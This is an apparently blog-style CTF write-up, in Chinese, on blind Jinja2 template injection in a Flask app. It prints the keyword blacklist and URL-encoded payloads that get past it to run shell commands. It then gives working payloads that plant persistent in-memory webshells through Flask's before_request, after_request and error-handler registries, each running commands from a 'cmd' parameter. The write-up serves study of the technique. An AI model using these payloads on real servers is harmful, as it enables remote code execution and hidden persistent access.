对ssti无回显的新版内存马学习
Werqy3 发表于 湖南 技术文章 1337浏览 · 2024-12-16 07:37

昨天打国赛遇见一个无回显ssti的题目,顺便学习了一下
源码:

from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)


@app.route('/', methods=["GET"])
def source():
    with open(__file__, 'r', encoding='utf-8') as f:
        return '<pre>' + html.escape(f.read()) + '</pre>'


@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # 安全过滤
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    return 'ok' if result is not None else 'error'


class HTTPProxyHandler:
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

    def handle_request(self, client_socket):
        try:
            request_data = b""
            while True:
                chunk = client_socket.recv(4096)
                request_data += chunk
                if len(chunk) < 4096:
                    break

            if not request_data:
                client_socket.close()
                return

            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
                proxy_socket.connect((self.target_host, self.target_port))
                proxy_socket.sendall(request_data)

                response_data = b""
                while True:
                    chunk = proxy_socket.recv(4096)
                    if not chunk:
                        break
                    response_data += chunk

            header_end = response_data.rfind(b"\r\n\r\n")
            if header_end != -1:
                body = response_data[header_end + 4:]
            else:
                body = response_data

            response_body = body
            response = b"HTTP/1.1 200 OK\r\n" \
                       b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
                                                                                b"Content-Type: text/html; charset=utf-8\r\n" \
                                                                                b"\r\n" + response_body

            client_socket.sendall(response)
        except Exception as e:
            print(f"Proxy Error: {e}")
        finally:
            client_socket.close()


def start_proxy_server(host, port, target_host, target_port):
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")

    try:
        while True:
            client_socket, addr = server_socket.accept()
            print(f"Connection from {addr}")
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
            thread.daemon = True
            thread.start()
    except KeyboardInterrupt:
        print("Shutting down proxy server...")
    finally:
        server_socket.close()


def run_flask_app():
    app.run(debug=False, host='127.0.0.1', port=5000)


if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000

    # 安全反代,防止针对响应头的攻击
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()

    print("Starting Flask app...")
    run_flask_app()

可以看见有黑名单:

blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']

写文件

第一种方法就是传统的绕过黑名单,采用拼接的方法
请看payload:

code={%25set+gl%3d'_'*2%2b'globals'%2b'_'*2%25}{%25set+bu%3d'_'*2%2b'builtins'%2b'_'*2%25}{%25set+im%3d'_'*2%2b'i''mport'%2b'_'*2%25}{%25set+hc%3d'so'[%3a%3a-1]%25}{{g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()}}

url解码后是这个样子的
code={%set+gl='_'*2+'globals'+'_'*2%}{%set+bu='_'*2+'builtins'+'_'*2%}{%set+im='_'*2+'i''mport'+'_'*2%}{%set+hc='so'[::-1]%}{{g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read()}}

它使用了 Jinja2 的 {% set %} 语句来创建变量,并且通过这些变量来访问和操作 Python 的全局环境 (globals) 和内置函数 (builtins)

{% set ... %} //用于在模板中设置变量。

'_'*2+'globals'+'_'*2 //用来构造字符串 __globals__  __builtins__

'_'*2+'import'+'_'*2 //试图构造字符串 __import__

'so'[::-1] //将字符串 'so' 反转为 'os'

g.pop[gl][bu][im](hc)['p''open']('cat+/f*>>app.py').read() //这部分代码从 globals 获取 __builtins__.__import__ 函数,然后用它来导入 os 模块,并调用 os.popen 来执行 shell 命令 cat /f*>>app.py,这会将根目录下所有以 f 开头的文件内容追加到 app.py 文件中。


访问首页发现成功写入

还可以对首页进行覆盖 payload:

{%25set+gl%3d''*2%2b'globals'%2b''*2%25}{%25set+bu%3d''*2%2b'builtins'%2b''*2%25}{%25set+im%3d''*2%2b'i''mport'%2b''*2%25}{%25set+mx%3d'so'[%3a%3a-1]%25}{{cycler.next[gl][bu]im'p''open'('ls+/>>app.py').read()}}


访问首页

内存马

测试代码:

from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)


@app.route('/', methods=["GET"])
def source():
    with open(__file__, 'r', encoding='utf-8') as f:
        return '<pre>' + html.escape(f.read()) + '</pre>'


@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # 安全过滤
   # blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
   #  for black in blacklist:
   #      if black in template_code:
   #          return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    return 'ok' if result is not None else 'error'


class HTTPProxyHandler:
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

    def handle_request(self, client_socket):
        try:
            request_data = b""
            while True:
                chunk = client_socket.recv(4096)
                request_data += chunk
                if len(chunk) < 4096:
                    break

            if not request_data:
                client_socket.close()
                return

            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
                proxy_socket.connect((self.target_host, self.target_port))
                proxy_socket.sendall(request_data)

                response_data = b""
                while True:
                    chunk = proxy_socket.recv(4096)
                    if not chunk:
                        break
                    response_data += chunk

            header_end = response_data.rfind(b"\r\n\r\n")
            if header_end != -1:
                body = response_data[header_end + 4:]
            else:
                body = response_data

            response_body = body
            response = b"HTTP/1.1 200 OK\r\n" \
                       b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
                                                                                b"Content-Type: text/html; charset=utf-8\r\n" \
                                                                                b"\r\n" + response_body

            client_socket.sendall(response)
        except Exception as e:
            print(f"Proxy Error: {e}")
        finally:
            client_socket.close()


def start_proxy_server(host, port, target_host, target_port):
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")

    try:
        while True:
            client_socket, addr = server_socket.accept()
            print(f"Connection from {addr}")
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
            thread.daemon = True
            thread.start()
    except KeyboardInterrupt:
        print("Shutting down proxy server...")
    finally:
        server_socket.close()


def run_flask_app():
    app.run(debug=False, host='127.0.0.1', port=5000)


if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000

    # 安全反代,防止针对响应头的攻击
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()

    print("Starting Flask app...")
    run_flask_app()

使用before_request方法构造内存马

before_request 是 Flask 框架中的一个方法,它允许你在每次 HTTP 请求到达视图函数之前执行特定的代码

from flask import Flask, request, g

app = Flask(__name__)

@app.before_request
def before_request():
    # 这里的代码将在每个请求处理之前执行
    g.start_time = time.time()  # 记录请求开始的时间
    print("This runs before each request.")

@app.route('/')
def index():
    # 这是处理主页请求的视图函数
    return "Hello, World!"

if __name__ == '__main__':
    app.run()

在这个例子中,before_request 函数会在每个请求到来前被调用,并且会打印一条消息到控制台

跟进这个装饰器内部看他调用了哪些函数:


可以看到before_request实际上调用的是self.before_request_funcs.setdefault(None, []).append(f)
代码逻辑:

self.before_request_funcs.setdefault(None, []): before_request_funcs 是一个字典,用来存储不同蓝图(或应用程序级别)的 before_request 函数列表。setdefault 方法确保了当键 None 不存在时,会创建一个空列表作为其值。这里 None 代表应用级别的 before_request 函数。
.append(f): 将传入的函数 f 添加到 before_request 函数列表中,这意味着该函数会在每个请求开始前被执行。f就是访问值,也是我们可以自定义的,那么这里只要我们设置f为一个匿名函数,这样每次发起请求前,都会触发一个这个匿名函数了
return f: 返回原始函数 f,这使得装饰器可以用作函数修饰,而不会改变函数本身的行为。

接下来就可以开始构造了

{{url_for.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda+:__import__('os').popen('dir').read())")}}

after_request方法构造内存马


与@app.before_request类似,after_request会在请求结束得到响应包之后进行操作
代码逻辑:

self.after_request_funcs.setdefault(None, []): after_request_funcs 是一个字典,用来存储不同蓝图(或应用程序级别)的 after_request 函数列表。setdefault 方法确保了当键 None 不存在时,会创建一个空列表作为其值。这里 None 代表应用级别的 after_request 函数。
.append(f): 将传入的函数 f 添加到 after_request 函数列表中,这意味着该函数会在每个请求处理完成后被执行。
return f: 返回原始函数 f,这使得装饰器可以用作函数修饰,而不会改变函数本身的行为。
self.after_request_funcs.setdefault(None, []).append(f)传入的f就是对应的自定义函数,但这里的f需要接收一个response对象,同时返回一个response对象,所以这个是需要定义一个返回值的

构造payload:

{{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':url_for.__globals__['current_app']})}}

Lambda 函数逻辑:

条件检查:if request.args.get('cmd') 检查请求的查询字符串中是否存在名为 cmd 的参数。
命令执行:如果 cmd 参数存在,那么使用 exec 执行一段 Python 代码,这段代码会读取并执行 cmd 参数中的命令,并将输出封装进一个新的 Flask Response 对象 CmdResp 中。
    exec('global CmdResp;CmdResp=make_response(os.popen(request.args.get("cmd")).read())')
    注意这里的 os.popen 和 exec 的使用,它们分别用于执行命令和动态执行 Python 代码。
返回值判断:== None 检查 exec 的返回值是否为 None(实际上 exec 总是返回 None)。
最终返回:如果上述条件成立(即 cmd 参数存在且命令成功执行),则返回新的响应对象 CmdResp;否则返回原始的响应对象 resp。

errorhandler方法构造内存马

from flask import Flask, render_template

app = Flask(__name__)
@app.route('/')
def index():
    return 'Hello World'

@app.errorhandler(404)
def page_not_found(e):
    print(e)
    # 日志记录或其它处理逻辑
    print('Error handler for 404')
    return '404 Error'

if __name__ == '__main__':
    app.run()

当用户请求了一个不存在的 URL 时,Flask 会调用 page_not_found 函数,要是我能操控404页面返回的东西,那不就可以执行任意代码了吗
跟进errorhandler


跟进register_error_handler函数


可以看到exc_class, code这两个变量,code就是404,exc_class是一个对象,f是我们404界面的返回值
code和f是我们可以手动构造的,但是exc_class得通过_get_exc_class_and_code函数获取,code_or_exception就是我们之前传的404,那我们就依靠这个来获取变量值,然后覆写即可
下面是一个不需要装饰器,直接使用 register_error_handler 方法来注册错误处理程序的例子:

from flask import Flask

app = Flask(__name__)

# 定义一个简单的错误处理程序
def handle_404(e):
    return 'Page not found', 404

def handle_exception(e):
    return 'An unexpected error occurred', 500

# 注册错误处理程序
app.register_error_handler(404, handle_404)
app.register_error_handler(Exception, handle_exception)

if __name__ == '__main__':
    app.run()

如果你多次对同一个 code_or_exception 使用 register_error_handler 方法,后面的调用会覆盖前面的注册。
payload:

exec("global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__('os').popen(request.args.get('cmd')).read()")

payload解读:

global exc_class; global code:
这一部分声明 exc_class 和 code 为全局变量。确保 exc_class 和 code 在后续代码中可以被正确引用。

exc_class, code = app._get_exc_class_and_code(404):
这行代码调用了 Flask 应用实例 app 的私有方法 _get_exc_class_and_code,传入 HTTP 状态码 404。该方法会返回与状态码 404 相关的异常类 (exc_class) 和状态码 (code)。

app.error_handler_spec[None][code][exc_class] = lambda a: __import__('os').popen(request.args.get('cmd')).read():
这里最关键的部分:
    app.error_handler_spec 是 Flask 内部用来存储错误处理程序的数据结构。
    lambda a: __import__('os').popen(request.args.get('cmd')).read() 创建了一个匿名函数(Lambda),它接收一个参数 a(通常是异常对象),但忽略了这个参数。
    它导入了 os 模块,并调用了 popen 方法来执行由 request.args.get('cmd') 获取的命令。request.args.get('cmd') 从 HTTP 请求的查询参数中获取名为 cmd 的值,这意味着任何通过 URL 参数传入的命令都会被执行。
    最后,.read() 方法读取命令执行的结果并返回。
0 条评论
某人
表情
可输入 255